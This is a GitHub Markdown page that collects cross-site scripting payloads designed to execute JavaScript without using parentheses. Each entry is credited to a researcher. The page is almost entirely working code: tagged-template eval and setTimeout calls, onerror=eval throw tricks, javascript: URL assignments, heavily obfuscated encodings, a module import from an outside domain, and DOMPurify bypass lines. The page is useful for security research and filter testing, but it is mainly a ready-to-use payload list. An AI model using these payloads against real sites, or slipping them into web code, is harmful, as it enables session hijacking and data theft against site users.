Skip to content

Latest commit

 

History

History
560 lines (327 loc) · 13.9 KB

Without-Parentheses.md

File metadata and controls

560 lines (327 loc) · 13.9 KB
Raw

XSS Without parentheses ()

This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...

All the POC's are alert box with number 23

alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

window.name='javascript:alert\x2823\x29';
Reflect.set.call`${location}${'href'}${name}`

Garethheyes

Reflect.apply.call`${alert}${undefined}${[23]}`

Garethheyes

navigation.navigate`javascript:alert\x2823\x29`

Garethheyes

var{haha:onerror=alert}=0;throw 1
var{a:onerror}={a:alert};throw 1

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Only Safari Garethheyes

<svg onload=onerror=eval,new'\u0022-alert\x2823\x29//'>

Garethheyes

{onerror=alert}throw 23

Garethheyes

throw{},onerror??=alert,"XSS"??123

Garethheyes

http://example.com/?%0aalert(23)
location.protocol='javascript:'

Garethheyes

[].sort.call`${alert}23`

Garethheyes

[].map.call`${eval}\\u{61}lert\x2823\x29`

Garethheyes

window.name='javascript:alert(23)';
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`;

Only Firefox h43z

throw onerror=eval,SyntaxError`alert\x2823\x29`

Only Firefox h43z

throw onerror=eval,Error`alert\x2823\x29`

h43z

throw Uncaught=onerror=eval,e=Error`*/;alert\x2823\x29`,e.name='/*',e

Garethheyes

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

example.com/#1/-alert(23)/

onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

terjanq

Put %0aalert(/23/)// anywhere in the URL

location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location

terjanq

x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x

terjanq

example.com/xss?%0aalert(/23/)//


Function`a${unescape. call`${location}`}```

Nowasky

c=document,h=c.head,x=h.part,p=g=h.id,h.valueOf=p.sub,x.valueOf=p.at,o=g++,l=g++,z=g++,e=g++,a=g++,s=g++,d=g++,j=g++,b=g++,h.part=h+p,y=h.innerHTML=x+p,h.part=h.innerHTML,p+=x,h.part=c.nodeName,p+=x,k=o+p,u=l+p,w=p+l,t=w+l,f=w+o+b+w,h.innerHTML=t+s+t+d+w+z+l+f+o+u+a+j+t+l+t+o+f+l+u+g+j+w+o+k+d+l,h.innerHTML=y+h.innerHTML+p+g+j+f+o+l+t+a+w+l+d+p+a+k+s+k+s+u+a+u+a+j+p+a+j+h

kabilan1290

onerror=alert;setTimeout`\x74\x68\x72\x6F\x77 23`

aemkei

onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';

aemkei

onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

aemkei

throw/**/Uncaught=window.onerror=eval,&quot;;alert\5023\51&quot;

Gareth Heyes

x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x

BitK

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

BitK

range = document.createRange``; 
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;

BitK

Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```

albinowax

window.name="alert(23)"
location="xss.html"

xss.html

eval.constructor`eval\x28name\x29```

hasegawayosuke

window.name="alert(23)"
location="xss.html"

xss.html

[].every.call`eval\x28name\x29${eval}`

Tomer Zait

[]["filter"]["constructor"]`alert\x2823\x29```

Pepe Vila

Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];

RootEval

x='javascript:alert\x2823\x29';x={x:location}=this

iwasakinoriaki

window.name="alert(23)"
location="xss.html"

xss.html

eval.call`${top.name}`

Cure53

window.name="<img src=x onerror=alert(23)>"
location="xss.html"

xss.html

document.write`${top.name}`

Brute Logic

<JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName>

Brute Logic

<Script Type=Module>import"//X55.is"</Script>

mage_1868 

location="https://example.com/xss.html/.source;alert(23)?xss="

example.com

eval.call`${location.pathname}`

Only Firefox Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);

throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']

</script>


<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol

</script>

physuru

elem=new Option
elem.classList.valueOf=String.prototype.charAt

elem.innerText=elem.outerHTML
elem.className=elem.innerHTML
amp=Object.__proto__.name+elem.classList

htag=new Text
elem.className=htag.nodeName
htag=Object.__proto__.name+elem.classList

elem.innerHTML=amp+htag+97
a=elem.innerText
elem.innerHTML=amp+htag+99
c=elem.innerText
elem.innerHTML=amp+htag+105
i=elem.innerText
elem.innerHTML=amp+htag+106
j=elem.innerText
elem.innerHTML=amp+htag+112
p=elem.innerText
elem.innerHTML=amp+htag+114
r=elem.innerText
elem.innerHTML=amp+htag+115
s=elem.innerText
elem.innerHTML=amp+htag+116
t=elem.innerText
elem.innerHTML=amp+htag+118
v=elem.innerText

elem.innerHTML=amp+htag+58
colon=elem.innerText

elem.innerHTML=amp+htag+40
lpar=elem.innerText
elem.innerHTML=amp+htag+41
rpar=elem.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'>

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;

With Script Gadgets

Using Prorotype Pollution PP Gadgets Repo

DOMPurify Bypass Parrot

delete DOMPurify.isSupported

DOMPurify Bypass hakatashi

delete document.implementation.__proto__.createHTMLDocument

Anything: @RenwaX23